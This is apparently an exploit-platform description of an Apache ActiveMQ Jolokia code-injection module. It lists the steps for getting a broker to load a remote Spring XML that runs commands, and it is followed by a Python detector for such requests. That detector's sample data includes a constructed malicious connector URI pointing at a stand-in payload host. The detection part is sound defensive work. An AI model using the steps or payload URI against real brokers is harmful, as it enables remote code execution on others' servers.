Apache ActiveMQ Jolokia Code Injection Exploit

This module abuses Jolokia access to invoke the ActiveMQ Broker MBean addNetworkConnector operation. The crafted connector uses the VM transport brokerConfig option to load a Spring XML document from the IMPACT web server. The XML instantiates java.lang.ProcessBuilder and executes the agent deployment command sequence.

The exploitation process performs the following steps:

1. Starts the IMPACT web server and registers a randomized Spring XML payload path.
2. Checks that the target Jolokia endpoint is reachable with the configured credentials.
3. Discovers the ActiveMQ broker name through Jolokia, or uses the configured broker name when provided.
4. Builds a malicious network connector URI using vm:// and brokerConfig=xbean to reference the Spring XML payload hosted by IMPACT.
5. Sends a Jolokia exec request to call addNetworkConnector(java.lang.String) on the ActiveMQ Broker MBean.
6. Waits for the target to fetch the Spring XML payload and execute the generated agent deployment command sequence.

The deployed agent will run with the same privileges as the Apache ActiveMQ service.
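For detection, the exec request described above can be spotted in captured Jolokia POST bodies. The following is an added example, not part of the module or of ActiveMQ: it assumes request bodies are available from a reverse proxy or WAF log, and the broker name, hosts and sample bodies are constructed.

```python
import json
from urllib.parse import unquote

# Constructed sample POST bodies (not captured traffic); names and hosts are made up.
BROKER = "org.apache.activemq:type=Broker,brokerName=constructed"
SAMPLE_BODIES = [
    '{"type":"read","mbean":"java.lang:type=Memory","attribute":"HeapMemoryUsage"}',
    json.dumps([{"type": "version"},
                {"type": "exec", "mbean": BROKER,
                 "operation": "addNetworkConnector(java.lang.String)",
                 "arguments": ["vm://constructed?brokerConfig%3Dxbean:"
                               "http://payload.example/constructed.xml"]}]),
    json.dumps({"type": "exec", "mbean": BROKER, "operation": "addNetworkConnector",
                "arguments": ["static:(tcp://peer.example:61616)"]}),
    "not json",
]

def iter_requests(body):
    """Yield each Jolokia request object; a body is one object or a bulk array."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return
    for item in doc if isinstance(doc, list) else [doc]:
        if isinstance(item, dict):
            yield item

def suspicious_connector_calls(body):
    """Return one finding per argument of an exec call to addNetworkConnector."""
    findings = []
    for req in iter_requests(body):
        if str(req.get("type", "")).lower() != "exec":
            continue
        if not str(req.get("operation", "")).startswith("addNetworkConnector"):
            continue
        args = req.get("arguments") or []
        for arg in args if isinstance(args, list) else [args]:
            uri = unquote(str(arg)).lower()
            # vm:// with brokerConfig=xbean points the broker at a Spring XML document
            loads_xml = "vm://" in uri and "brokerconfig=xbean" in uri
            findings.append({"mbean": str(req.get("mbean", "")), "argument": str(arg),
                             "severity": "high" if loads_xml else "review"})
    return findings

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        for finding in suspicious_connector_calls(body):
            print(finding["severity"], finding["mbean"], finding["argument"])
```

A "review" finding is a connector added over Jolokia without the XML-loading option; it is worth confirming against change records, since connectors are normally defined in the broker configuration.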
Exploit Platform
Product Name